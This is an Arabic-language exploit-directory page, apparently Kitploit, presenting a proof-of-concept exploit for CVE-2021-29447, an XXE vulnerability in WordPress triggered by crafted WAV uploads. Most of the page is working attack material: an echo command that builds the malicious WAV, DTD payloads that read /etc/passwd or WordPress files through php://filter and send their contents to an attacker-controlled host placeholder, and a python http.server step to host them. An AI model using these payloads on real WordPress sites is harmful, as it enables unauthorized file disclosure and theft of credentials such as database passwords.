Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-29447 — استغلال إثبات مفهوم لـ CVE-2021-29447، وهي ثغرة XXE في WordPress تتيح الكشف عن ملفات تعسفية و SSRF عبر ملفات WAV مصممة. | Kitploit
أدوات/GitHubGitHub/assassinukg/cve-2021-29447
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubassassinukg/cve-2021-29447

CVE-2021-29447

استغلال إثبات مفهوم لـ CVE-2021-29447، وهي ثغرة XXE في WordPress تتيح الكشف عن ملفات تعسفية و SSRF عبر ملفات WAV مصممة.

عرض المستودع
1منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-29447

التأثير

الكشف التعسفي عن الملفات: يمكن استرجاع محتوى أي ملف على نظام ملفات المضيف، مثل wp-config.php الذي يحتوي على بيانات حساسة مثل بيانات اعتماد قاعدة البيانات. تزوير الطلب من جانب الخادم (SSRF): يمكن إجراء طلبات HTTP نيابة عن تثبيت ووردبريس. اعتمادًا على البيئة، يمكن أن يكون لهذا تأثير خطير. استغلال الثغرة

تم تحديد موقع ووردبريس متأثر بهذه الثغرة أثناء عملية التعداد بمساعدة أداة wpscan.

صورة

إنشاء ملف WAV خبيث.

الأمر سهل جدًا، في وحدة تحكم bash الخاصة بك

nano poc.wav echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

في جهاز المهاجم الخاص بك، قم بإنشاء ملف dtd مع الكود الذي سيتم تنفيذه على خادم الويب.

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

ملاحظة: لقراءة ملفات ووردبريس استخدم الصيغة "../WP-FILE.php"

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

استضف خادم بايثون لدليل الملفات (python3 -m http.server 8081)

المراجع:

https://github.com/motikan2010/CVE-2021-29447 https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5

تنزيل الأداة